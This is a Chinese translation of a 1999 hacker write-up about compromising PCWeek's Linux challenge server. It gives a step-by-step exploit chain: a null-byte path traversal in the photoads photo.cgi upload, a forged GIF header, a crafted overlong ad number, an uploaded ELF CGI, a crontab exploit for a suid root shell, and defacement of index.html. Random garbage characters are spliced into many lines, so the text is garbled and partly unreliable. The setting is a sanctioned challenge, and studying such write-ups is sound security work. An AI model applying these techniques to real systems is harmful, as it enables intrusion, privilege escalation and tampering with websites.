JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
- r9 `+ J7 O8 y: g. w& M- F和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
" |2 M. d$ ^0 G- b( e# ^5 J的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

) R9 @: I4 A7 l) o8 u( g6 z
首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
9 d6 l# R* m. M2 n* s" [" {以我们只能从 HTTP 服务器着手了。

lemming:~# telnet securelinux.hackpcweek.com 80
% V+ r) A- D' i" DTrying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
, k0 Y( G) t  DEscape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
8 h/ ?6 R# _' p1 e1 KDate: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
; }, l9 h) @+ i7 n+ c$ ~8 n$ `' m(...)
Connection closed by foreign host.
lemming:~#

) W+ d1 q4 J( R: }嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
* c/ J0 ^- m' u, \0 o7 K8 x装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
. C" F/ R& s* x# S2 ^1 I/ o8 b+ ?的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
/ F1 {# M4 A+ X/ x& v& n# Z结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
$ w/ t0 c6 D6 A& ~# |6 Z: E" E了网站DocumentRoot下的目录结构：
. y) Z7 t4 x$ P' \5 b8 T0 h. A
- E# O( _/ V! t* d1 r% U/
/cgi-bin
* x4 D9 d6 [1 ^4 F3 T/photoads/
; d. j6 h6 h( G/ x( d2 h/photoads/cgi-bin

0 g$ D# w1 [  ]7 l  Q很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
/ J% e; }3 H! O4 n) Z: L$ q运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
$ }' f2 ^: c! O1 a, rsecurelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
3 B. O) Y4 F/ K$ W9 N& J  ]nobody）等。
现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
! E: B0 k5 o) t' P: ^' v命令的漏洞，如：

<!--#include file="..."--> for SSI
1 m9 V% r: e* h$ R( P, E<!--#perl ...--> for mod_perl

但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
5 H! q: c4 t4 ?" \) i! M# s* O: a" c个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
令嵌入到由服务器端解析的 HTML 代码中：

在 post.cgi，行 36：
& k7 F/ ^: t+ uprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
. g5 B0 j! N9 b6 F8 ?& P) M
# X! M9 m9 }- ]! J- e5 v7 Q8 _$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
- ~4 {( h$ X, `4 v3 y, N3 e( _码中。
1 i1 F! A/ P/ [3 O" P/ o请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
6 B; ?7 L2 Y2 z- V( U, T在命令行下使用这些文件如下：

lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
) ~' L& h; y) W; G6 \
  r4 Y5 x( ~5 ?3 S5 s但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
2 d2 R5 z" l# R入系统。
1 a* z6 h/ w& q4 ?% h, \
因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
( A2 J! J0 P1 E
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

/ S8 G( E8 b# J4 @- [2 t2 e) \advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)
0 T5 J3 ^0 ]9 m7 Z
6 z# D9 u. @3 ]3 `$ A% p$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
! u) I" ^0 ~1 O; @但其余两个就……
4 Z+ ^0 L  l' b6 t; a
在 photo.cgi，行 132：
! g+ C2 g! B! c5 d0 q$write_file = $Upload_Dir.$filename;
% k1 R/ V4 B$ p3 r5 O
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
9 b* U7 P7 m7 Z2 g8 D8 wprint ULFD $UPLOAD{'FILE_CONTENT'};
6 l% d5 p+ g6 H9 Gclose(ULFD);

# o) L7 v6 R. }. u因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
$write_file 变量来自：

" s! E0 J: v( R6 N7 Z% L2 f$write_file = $Upload_Dir.$filename;

其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
( ?* W* L5 s& Z( p; i  |1 ?
/ p! D3 R- G3 C, m在 photo.cgi，行 226：
# {! h. [- b3 N, c1 qif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
2 v- g" Y. E" Y, L4 l3 a% Y) L
$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

  `# G  D% @& e/ P; g1 Q2 E9 P# [if ($filename =~ m/gif/) {
$type = '.gif';
  A: H/ }$ H7 ]: P}elsif ($filename =~ m/jpg/) {
. c" |. t5 j1 J. g$type = '.jpg';
9 a& j2 e0 P3 W- Z5 |/ I}else{
/ D0 b6 o; q( Y6 k* @( m3 @{&Not_Valid_Image}
}
: X: m6 L" d$ Y# T6 ^
+ w7 S( h" ~- w4 ~) r$ V1 i; F由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
; Q, d0 b0 ], {. f' m$ v& B须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
+ w1 t' B/ E* Z% z1 a得任何文件。匹配表达式为：
" H# X/ b/ |* J( y
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
# x  n3 w: p- U$ A3 v, O
6 a4 M! H. O: m; l: Q9 V我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
! A0 E2 g- e& d* A1 z须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
4 e1 o! K5 ~# J6 p3 M经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
9 G$ O& B0 q" [( I% @
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
' R5 {- k+ I2 @  n; e
可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
& t/ F9 T+ o6 Q- t包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
9 P1 y( X# a; q4 v4 y" A- ~3 ?  @: G删除该上载文件。这当然不是我们所希望的！
1 u/ u/ z# L) i/ F+ m0 TPCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
而将主要精力集中在GIF上。
& z3 a2 r, D! i' N) k, v' y% s9 O
5 {% e9 u+ X" q+ @( A# W: \if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
' @9 E2 F* v8 Q" l# iopen ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
# z; ^9 Y3 f' o& M& N(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
: P+ I3 M8 s% ]  f+ U7 y. j$PhotoHeight = $height;
% _. S- ]4 l/ M% c$PhotoSize = $size;
4 @2 B* T7 N3 U3 ?" f3 Creturn;
; d+ j9 ^3 a2 w% `}

在 photo.cgi，行 140：
* }: E% s- X5 q  L# s+ t
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}

% O7 K7 X0 W. R) O0 F+ Nif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}

+ A4 O! Q& [. k5 ~由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
# x# q& a; }; e0 u% Z7 R7 \。
所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
2 ^. @: l! o/ z; s5 A综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
; ~, [1 u1 H+ _) M  _6 C# v2 r7 J研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
: Z& q' a) }9 E) j& b5 h（NUL）。
7 Y- U" x7 q" E8 T在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
: h/ s8 a6 {+ Z+ o: ^4 D3 h# l个问题：

chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
' y& \2 e5 k$ Lrename("$write_file", "$Upload_Dir/$newname");
3 G( O0 c' t/ l! X" H3 a; V
6 ?6 [% V# e' FShow_Upload_Success($write_file);
- l3 E# S$ b9 V1 q6 U
哇！文件将被改名/移动（这可是我们绝对不希望的！）。
$ @9 _$ c: c" F查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

+ J% ^+ s8 l3 b/ a) I) T' M$UPLOAD{'AdNum'} =~ tr/0-9//cd;
' d3 B- D1 O8 B; _! M! A; r$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
( R# P+ n6 W) a0 U3 E( m$AdNum = $UPLOAD{'AdNum'};
6 w0 x) F& j+ L5 v6 }" R0 q
" c4 H, I) {* _0 J0 ]其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
+ ~9 E4 t; `9 ]4 c# z那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
3 n& W* F2 `# ~哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
5 Z( z2 _  S' x* m  h, a文件名超过1024字节长，即可绕过这个过滤器。
所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
; d% L& |- _% L) H) }% W+ \/ ^1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
; q* F) y% {; ~9 m我们又遇到另一个难题了！……
! G" J! S0 a) C- U1 L0 W6 s
我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
, o( i1 C1 q' g" i8 M* ]3 z后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
& H% Q( n2 ?! r  _4 x呢？;-)
, c( z+ w; b( H6 F5 b9 {请阅读用于创建新AD值的程序文件 long.adnum。
$ h/ A9 Z" s2 Q* O; F当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。

% w* Q; U1 c8 @3 e/ F& L  Z; l0 f% ^现在就让我们对该主机试一试这个方法。
嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
5 h, Q' {; G# `5 c, X* C成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
) }6 X7 @8 q: i! p, Q( v

; _7 _+ q% G2 r/ A, L$ s5 X让我们试一下是否还有其它入侵方法……
) g! P$ l* H% `$ f" _* s' X
我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
! P0 C% b/ `) }' `. A% X' ~的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
$ D# d. ]; Q3 N道它有什么用吗？:)）
现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
然而，这个以CGI方式运行的shell脚本必须符合以下格式：
  Q' r/ g/ Y$ b6 K4 u. s0 m! H5 B5 H/ s
#!/bin/sh
echo "Content-type: text/html"
# p* j4 L& W" U/ t, ^find / "*secret*" -print

( x2 D, O% P( g7 j同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……
# ]/ y+ J# t3 \. R3 t: ^5 u
' _& u: _" D! c# N#!/bi\00\00\00\00n/sh

/ ?( @6 _! S2 ?5 l2 D. A* s* ]以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(
* u% w6 l2 ^+ v; S7 d# W
* D% J8 ^; G( t% l: Y0 Q1 f让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
! Z' z1 C* a; M, k$ Z; a9 J5 m解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
! b6 h4 @* y0 F0 C: b件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
0 `7 H( `0 D' \- h* i9 A. Q5 vURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
6 f% L; K5 j8 o, E2 {+ `7 W
  p% n  N; D4 v: [1 r/ ]以下这个程序：
+ ^" T. Q8 A# K5 b
lemming:~/pcweek/hack/POST# cat fin.c
& h# n, }- W4 g! e( _4 n0 E3 y#include <stdio.h>
main()
! x: U9 R; t$ A$ f$ u{
printf("Content-type: text/html\n\n\r");
/ m# O* I8 e* H9 @5 _6 J( d1 y, Bfflush(stdout);
execlp("/usr/bin/find","find","/",0);
0 f3 b8 K! {$ W9 o4 P}

编译后：
/ ?4 |' E/ Z* E: Q8 m* _& w! K
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

优化（清除symbols）后：
. s* b" M8 `! j  O
lemming:~/pcweek/hack/POST# strip fin
: Y: L+ g* c4 t5 {2 {lemming:~/pcweek/hack/POST# ls -l fin
; `- P: h0 y, R, o% O, @+ R; t-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#
" q* l) t) X4 i# k: ^
URL编码后：

lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
; x" l8 a" R  k) ^( l# A-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
: Q, S* Z  o/ g1 n& x. a效：
, \8 A5 S$ ?) l2 {/ f: |
lemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
  c  a  Y5 u1 g* L  ~+ f-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#

请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。

0 h1 k0 \' o+ t% M8 u) U0 S现在，将这个CGI上载到服务器，再用浏览器访问它，如：
" b! ]5 x0 P4 T; z, Y6 w8 F
; j$ J6 r$ v' uwget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
- b+ f/ ^! f2 i1 N我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]
4 P5 q% Y( x) z7 `! X$ C+ ]

1 U& G* A" o& x, L( s" l7 h好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
. Z3 R5 H7 `# ^  U& {% O轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
; d3 A" [7 I% F$ C; P( `. k观察其运行结果。
- T5 H4 `& b! e$ l  ^: T# E% H我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

+ A. i# Q2 T( [: ?execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
7 Z! N# [8 M+ Y% A9 c  j
好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)

" I3 n" ]% @# T